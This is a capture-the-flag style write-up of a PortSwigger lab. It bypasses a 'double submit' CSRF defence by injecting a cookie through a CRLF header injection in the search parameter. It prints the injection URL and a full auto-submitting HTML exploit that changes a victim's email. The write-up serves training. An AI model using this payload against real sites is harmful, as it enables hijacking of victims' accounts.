Portswigger Cross-Site Request Forgery Lab Simple Solution | Karthikeyan Nagaraj

• Cross-Site Request Forgery (CSRF) is a type of security vulnerability that affects web applications.
• It occurs when an attacker tricks a user’s browser into sending a malicious request to a web application on behalf of the user, often without the user’s knowledge or consent.
• The attacker takes advantage of the trust that a web application has in a user’s browser, exploiting the fact that the browser automatically includes authentication credentials (such as cookies) with each request.
• This can allow an attacker to perform actions such as changing a password, transferring funds, or accessing sensitive information.
• For example, if a user is logged into their online banking account and visits a malicious website, the attacker could use CSRF to transfer money from the user’s account without their knowledge.

Lab Description:

• This lab’s email change functionality is vulnerable to CSRF. It attempts to use the insecure “double submit” CSRF prevention technique.
• To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer’s email address.
• You can log in to your own account using the following credentials: wiener:peter

Analysis:

1. We know that the Email change Functionality is vulnerable to CSRF, So Let’s capture the Request

2. Send the Request to the Repeater

3. Perform a search, send the resulting request to Burp Repeater, and observe that the search term gets reflected in the Set-Cookie header

4. Since the search function has no CSRF protection, you can use this to inject cookies into the victim user’s browser.

5. Create a URL that uses this vulnerability to inject a fake csrf cookie into the victim's browser:

/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None

6. Generate POC for the Current request

7. Modify the poc and add the below script into the HTML code

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="abc&#64;gmail&#46;com" />
      <input type="hidden" name="csrf" value="abc" />
      <input type="submit" value="Submit request" />
    </form>
  <img src="https://YOUR-LAB-ID.web-security-academy.net/?search=abc%0d%0aSet-Cookie:%20csrf=abc%3b%20SameSite=None" onerror="document.forms[0].submit();"/>
  </body>
</html>

8. Paste the code and Deliver it to the Victim

Feel Free to Ask Queries via LinkedIn and to Buy me a Cofee : )

Thank you for Reading!!

Happy Hunting ~

Author : karthikeyan Nagaraj ~ Cyberw1ng